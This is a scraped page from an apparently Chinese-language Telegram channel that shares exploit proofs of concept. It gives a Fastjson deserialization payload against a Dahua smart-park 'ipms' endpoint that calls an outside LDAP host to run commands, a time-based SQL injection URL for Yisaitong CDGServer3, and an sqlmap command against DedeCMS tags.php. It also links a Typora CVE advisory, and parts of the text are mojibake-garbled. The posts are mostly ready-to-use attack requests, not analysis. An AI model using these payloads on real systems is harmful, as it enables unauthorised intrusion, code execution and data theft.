๐Ÿ”ฐ้ป‘็›’-๐‘ฉ๐’๐’‚๐’„๐’Œ ๐‘ฉ๐‘ถ๐‘ฟ-่ต„ๆบๅ…ฌๅผ€๐Ÿ…ฅ๏ผˆๆ•ฐๆฎ็œ‹ๆ–‡ไปถ๏ผ‰
46.3K subscribers
46 photos
8 videos
356 files
73 links
Download Telegram
(CVE-2023-2317) ๅŸบไบŽ Typora DOM ็š„่ทจ็ซ™็‚น่„šๆœฌๅฏผ่‡ด่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ
Typora ๆ˜ฏไธ€ๆฌพๆต่กŒ็š„่ทจๅนณๅฐ Markdown ็ผ–่พ‘ๅ™จ๏ผŒๅ…่ฎธ็”จๆˆทๅˆ›ๅปบๅ’Œ็ผ–่พ‘ๅ…ทๆœ‰ๅฎžๆ—ถ้ข„่งˆๅŠŸ่ƒฝ็š„ Markdown ๆ–‡ไปถ
https://starlabs.sg/advisories/23/23-2317/
๐Ÿ‘5โค2
ๅคงๅŽๆ™บๆ…งๅ›ญๅŒบ็ปผๅˆ็ฎก็†ๅนณๅฐ ipms ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž POC
POST /ipms/barpay/pay HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: id
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://xxxxx/Basic/TomcatEcho", "autoCommit": true}
โค1
ไบฟๅกž้€š update.jsp sql ๆณจๅ…ฅๆผๆดž POC
GET http://1ip:port/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20D ELAY%20%270:0:2%27--
๐Ÿ‘1
่ฟท่Œซๅคงๅญฆ็”ŸvsไปŠๆ—ฅ็™พไธ‡้ป‘ไบงๅคดๅญ
๐Ÿ‘28๐Ÿคก2โค1
Dedecms ็ป‡ๆขฆ sql ๆณจๅ…ฅ POC
DedeCMS 5.7.110 ไธญๅ‘็Žฐไบ†ไธ€ไธชไธฅ้‡ๆผๆดžใ€‚ๆญคๆผๆดžๅฝฑๅ“ๆ–‡ไปถ/uploads/tags.php ็š„ๆœช็Ÿฅไปฃ็ ใ€‚ๅฏนๅ‚ๆ•ฐ tag_alias ็š„ๆ“ไฝœไผšๅฏผ่‡ด sql ๆณจๅ…ฅใ€‚

sqlmap.py -u "http://โ€ฆโ€ฆ/tags.php?QUERY_STRING=/alias/bbb*" -dbs --batch
๐Ÿ‘1